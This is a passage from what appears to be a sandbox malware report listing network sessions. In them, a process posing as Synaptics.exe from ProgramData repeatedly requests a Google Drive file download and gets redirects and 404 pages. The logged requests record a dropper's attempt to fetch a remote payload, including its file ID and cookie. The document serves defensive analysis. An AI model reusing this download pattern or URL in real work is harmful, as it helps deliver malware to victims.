                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                65192.168.2.450015142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:28 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:29 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-XitErQQyISWj6qfkVD-Etg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                66192.168.2.450016142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:28 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:30 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC7amO0ZLM5ngsJWlKopLebCK2xDHSAc3h7N4CjFS0Nl-sboq46qA-GFRY47JftW28Vfpky-nJI
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:29 GMT
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-r3iLReYBnGK3BnBc1rQnyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:21:30 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:21:30 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 6b 77 72 6d 73 68 57 72 62 42 70 61 50 56 6d 43 37 44 46 53 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="fkwrmshWrbBpaPVmC7DFSQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:21:30 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                67192.168.2.450014142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:28 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:29 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-HuN8SjnYByu4uvAEsXVC-Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                68192.168.2.450029142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:32 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-QvY8tes4tUOWYlv8qEdP1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                69192.168.2.450030142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:32 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:32 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:32 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-icsS_fcEMzzQAlTxqNNTow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                70192.168.2.450050142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:36 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:36 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-cPikUqT6NfHYDPWP1uwGcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                71192.168.2.450049142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:36 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:36 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:36 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-eqy1Lq0omu021OiZUNVm-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                72192.168.2.450059142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:39 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-3cV_-T7uqLYVlEGRVFX_2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                73192.168.2.450060142.250.181.144434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:38 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:39 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-5_cFle3DLXFku0H4L9_XLQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                74192.168.2.450061142.250.181.974434076C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-24 17:21:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:21:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC664O23TkCl0mP_zKOYnXz9pUqBg-lSkxlnehcM4q45z0NPYzwMpqfyZVwxtnxD7bRy
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:21:39 GMT
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-gzHb37A3dDu2PAKfqlrN1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
